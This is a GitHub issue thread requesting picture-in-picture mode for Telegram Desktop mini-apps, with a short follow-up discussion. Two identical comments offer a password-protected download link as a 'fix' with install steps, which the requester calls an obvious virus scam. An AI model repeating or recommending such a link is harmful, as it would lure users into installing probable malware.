### ISSUE TITLE
Picture-in-Picture (PiP) for Mini-Apps

### ISSUE THREAD

**Issue by Laiteux** [telegramdesktop/tdesktop#28335]
### Is your feature request related to a problem?

Yes, this feature request is related to the problem of limited multitasking capabilities when using Telegram Mini-Apps on Desktop.

Currently, users have to fully switch between the mini-app and other content within Telegram or on their device. This disrupts the flow of multitasking, especially when trying to interact with a mini-app while also engaging in chats, watching videos, or using other apps.

### Describe the solution you'd like

I would like to see a Picture-in-Picture (PiP) mode implemented for Mini-Apps. This would allow users to minimize a mini-app into a small, floating window that can be moved around the screen while they continue to use other parts of Telegram or even switch to other apps on their device.

The PiP window should be resizable and provide basic controls (e.g., close, expand back to full-screen) to maintain user convenience and multitasking efficiency.

### Describe alternatives you've considered

An alternative could be a split-screen feature within Telegram, allowing users to use a mini-app and chat simultaneously in separate sections of the screen.

### Additional context

Picture-in-Picture is already an established feature in Telegram for video playback, where users can minimize a video into a small, floating window while continuing to browse chats or use other parts of the app. This functionality enhances multitasking by allowing users to watch videos and engage in conversations simultaneously.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Laiteux** [comment]
^ Obvious virus scam — do not open.

**Comment by ilya-fedin** [comment]
> Currently, users have to fully switch between the Mini-App and other content within Telegram or on their device.

What do you mean by that? I can interact with the main window just fine while a web app is open.

**Comment by Laiteux** [comment]
Right. What I am saying is you can not do both at once: the mini-app will be pushed to the background.
